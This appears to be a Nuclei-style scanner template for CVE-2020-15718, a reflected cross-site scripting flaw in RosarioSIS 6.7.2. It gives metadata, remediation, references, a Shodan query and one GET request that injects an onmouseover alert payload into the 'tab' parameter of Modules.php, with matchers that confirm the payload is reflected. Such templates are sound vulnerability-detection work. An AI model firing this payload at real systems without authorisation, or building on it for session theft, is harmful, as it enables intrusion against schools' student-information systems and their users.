id: CVE-2020-15718 info: name: RosarioSIS 6.7.2 - Cross-Site Scripting author: 0xr2r,jarvis-survives severity: medium description: | RosarioSIS version 6.7.2 and earlier contains a reflected cross-site scripting (XSS) vulnerability in the Preferences module. The 'tab' parameter in Modules.php is not properly sanitized, allowing an attacker to inject arbitrary JavaScript code via a crafted URL. impact: | An attacker can execute arbitrary JavaScript in the context of a victim's browser session, potentially leading to session hijacking, credential theft, or other malicious actions. remediation: | Update RosarioSIS to the latest version where input validation has been improved. reference: - https://exchange.xforce.ibmcloud.com/vulnerabilities/184944 - https://github.com/MarkLee131/awesome-web-pocs/blob/main/CVE-2020-15718.md - https://gitlab.com/francoisjacquet/rosariosis/-/blob/mobile/CHANGES.md - https://gitlab.com/francoisjacquet/rosariosis/-/commit/89ae9de732024e3a2e99262aa98b400a1aa6975a classification: cve-id: CVE-2020-15718 cwe-id: CWE-79 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 epss-score: 0.06325 epss-percentile: 0.92723 cpe: cpe:2.3:a:rosariosis:rosariosis:6.7.2:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.html:"RosarioSIS" product: rosariosis vendor: rosariosis tags: cve,cve2020,rosarios,xss,rosariosis,vuln http: - method: GET path: - '{{BaseURL}}/Modules.php?modname=Users/Preferences.php&tab="%20onmouseover=alert(document.domain)%20x="' matchers-condition: and matchers: - type: word part: body words: - '" onmouseover=alert(document.domain)' - 'RosarioSIS' condition: and case-insensitive: true - type: word part: content_type words: - "text/html" - type: status status: - 200 # digest: 4a0a004730450221009725acad43ef44dd859f85af8fcba17e259abe651b6971d20a12afe84644b00502205129a9485e2dd70bfbe8e426e62af47ac73c5c99d6b84721222e5a3d98201ff3:922c64590222798bb761d5b6d8e72950